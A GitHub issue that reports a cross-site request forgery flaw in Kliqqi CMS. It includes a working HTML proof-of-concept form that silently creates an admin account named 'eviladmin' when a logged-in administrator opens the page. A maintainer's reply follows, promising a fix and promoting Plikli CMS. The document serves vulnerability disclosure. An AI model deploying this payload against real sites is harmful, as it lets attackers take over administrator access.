Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a CSRF which can create an account with admin's privileges. #256

Open
C4o opened this issue May 23, 2018 · 1 comment
Open

There is a CSRF which can create an account with admin's privileges. #256

C4o opened this issue May 23, 2018 · 1 comment

Comments

@C4o
Copy link

C4o commented May 23, 2018

After admin logging in,click the following link,eviladmin will be created with admin's privileges.
PoC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/kli/admin/admin_users.php" method="POST">
      <input type="hidden" name="username" value="eviladmin" />
      <input type="hidden" name="email" value="a11aa&#64;aa&#46;com" />
      <input type="hidden" name="level" value="admin" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="mode" value="newuser" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
@redwinefireplace
Copy link

I am redwine, a former developer on Kliqqi, and currently the owner of Plikli CMS!
Visit and register on https://plikli.com
I will post the fix for this vulnerability on the Plikli Forum, tonight or tomorrow before noon at the most.
Plikli CMS is an upgraded version of Pligg and Kliqqi. Read these sections to get familiar with the bug and vulnerability fixes, modifications, enhancement and new features, settings and Modules:
Plikli Settings https://www.plikli.com/plikli-settings/
Plikli Manage https://www.plikli.com/plikli-manage/
Plikli Modules & Widgets https://www.plikli.com/plikli-modules-widgets/

Also read the changelog to follow on all the fixes in Plikli, compared to Pligg and Kliqqi
Plikli CMS Changelog https://www.plikli.com/download-plikli/

Before installing or migrating from Kliqqi/Pligg, read the Documentation section:
https://www.plikli.com/documentation/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants